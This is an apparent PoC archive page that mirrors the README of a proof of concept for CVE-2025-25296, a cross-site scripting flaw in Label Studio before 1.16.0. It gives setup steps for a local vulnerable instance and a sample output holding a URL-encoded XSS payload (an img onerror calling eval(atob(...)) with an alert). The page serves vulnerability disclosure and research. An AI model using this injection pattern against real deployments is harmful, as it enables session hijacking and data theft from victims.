Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2025-25296 PoC — Label Studio allows Cross-Site Scripting (XSS) via GET request to `/projects/upload-example` endpoint

Source
https://github.com/math-x-io/CVE-2025-25296-POC
Associated Vulnerability
Title:Label Studio allows Cross-Site Scripting (XSS) via GET request to `/projects/upload-example` endpoint (CVE-2025-25296)
Description:Label Studio is an open source data labeling tool. Prior to version 1.16.0, Label Studio's `/projects/upload-example` endpoint allows injection of arbitrary HTML through a `GET` request with an appropriately crafted `label_config` query parameter. By crafting a specially formatted XML label config with inline task data containing malicious HTML/JavaScript, an attacker can achieve Cross-Site Scripting (XSS). While the application has a Content Security Policy (CSP), it is only set in report-only mode, making it ineffective at preventing script execution. The vulnerability exists because the upload-example endpoint renders user-provided HTML content without proper sanitization on a GET request. This allows attackers to inject and execute arbitrary JavaScript in victims' browsers by getting them to visit a maliciously crafted URL. This is considered vulnerable because it enables attackers to execute JavaScript in victims' contexts, potentially allowing theft of sensitive data, session hijacking, or other malicious actions. Version 1.16.0 contains a patch for the issue.
Description
Proof of Concept (POC) for the CVE-2025-25296 vulnerability affecting Label Studio versions prior to 1.16.0
Readme
# CVE-2025-25296 Proof of Concept (POC)

## Description

This project demonstrates a Proof of Concept (POC) for the CVE-2025-25296 vulnerability affecting Label Studio, an open-source data labeling tool. The vulnerability resides in the `/projects/upload-example` endpoint, which fails to sanitize user-provided HTML content in GET requests. This allows attackers to execute arbitrary JavaScript in the victim's browser, leading to potential Cross-Site Scripting (XSS) attacks.

## Vulnerability Details

- **Affected Component**: `/projects/upload-example` endpoint of Label Studio
- **Impact**: Cross-Site Scripting (XSS)
- **Root Cause**: Improper sanitization of user-provided HTML content in GET requests
- **Exploitation**: Crafting a malicious URL containing a specially formatted XML label config with embedded JavaScript
- **Mitigation**: Update to Label Studio version `1.16.0` or later

## Workaround

As a temporary workaround:
1. Avoid using the `/projects/upload-example` endpoint with GET requests.
2. Prefer POST requests for uploading configurations.

## Requirements

- Python 3.x
- Docker
- Required Python packages (installed via `pip` using `setup.sh`)

## Files

- `poc.py`: Python script to exploit the vulnerability and demonstrate the XSS attack.
- `setup.sh`: Script to set up the vulnerable environment using Docker.

## Setup Instructions

1. Clone this repository:
    ```bash
    git clone CVE-2025-25296-POC
    cd CVE-2025-25296-POC
    ```

2. Run the setup script:
    ```bash
    chmod +x setup.sh
    ./setup.sh
    ```

3. The setup script will:
    - Check for Docker installation.
    - Install required Python packages.
    - Pull the vulnerable Label Studio Docker image (`1.15.0`).
    - Run the vulnerable Label Studio instance on `localhost:8080`.
    - Create an account on http://localhost:8080

## Exploitation

1. Run the exploit script:
    ```bash
    python poc.py
    ```

2. The script will:
    - Send a crafted GET request to the vulnerable `/projects/upload-example` endpoint.
    - Output a URL with the payload.

3. Open the provided URL in a web browser to observe the XSS alert triggered by the payload.

## Example Output

```text
[*] Attempting to send XSS payload...
[+] Payload successfully sent!
[+] Check this URL in a browser: http://localhost:8080/projects/upload-example/?label_config=%3CView%3E%3C!--%20%7B%22data%22%3A%20%7B%22text%22%3A%20%22%3Cdiv%3E%3Cimg%20src%3Dx%20onerror%3Deval(atob(%60YWxlcnQoIlhTUyIp%60))%3E%3C/div%3E%22%7D%7D%20--%3E%3CHyperText%20name%3D%22text%22%20value%3D%22%24text%22/%3E%3C/View%3E
```

## Mitigation Recommendations

To mitigate this vulnerability:
1. Update Label Studio to version `1.16.0` or later.
2. Enable a strict Content Security Policy (CSP) to block script execution.

## Disclaimer

This project is intended for educational and research purposes only. Use it responsibly and only on systems where you have explicit permission. Unauthorized use of this tool may violate applicable laws.

## References

- [Label Studio GitHub Repository](https://github.com/heartexlabs/label-studio)
- [CVE-2025-25296 Details](https://cve.mitre.org/)
File Snapshot

 [4.0K]  /data/pocs/bdc7896cb24ef6d3e22cfdca7221f3277b6d2438
├── [1.2K]  poc.py
├── [3.1K]  README.md
├── [  26]  requirements.txt
└── [ 391]  setup.sh

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →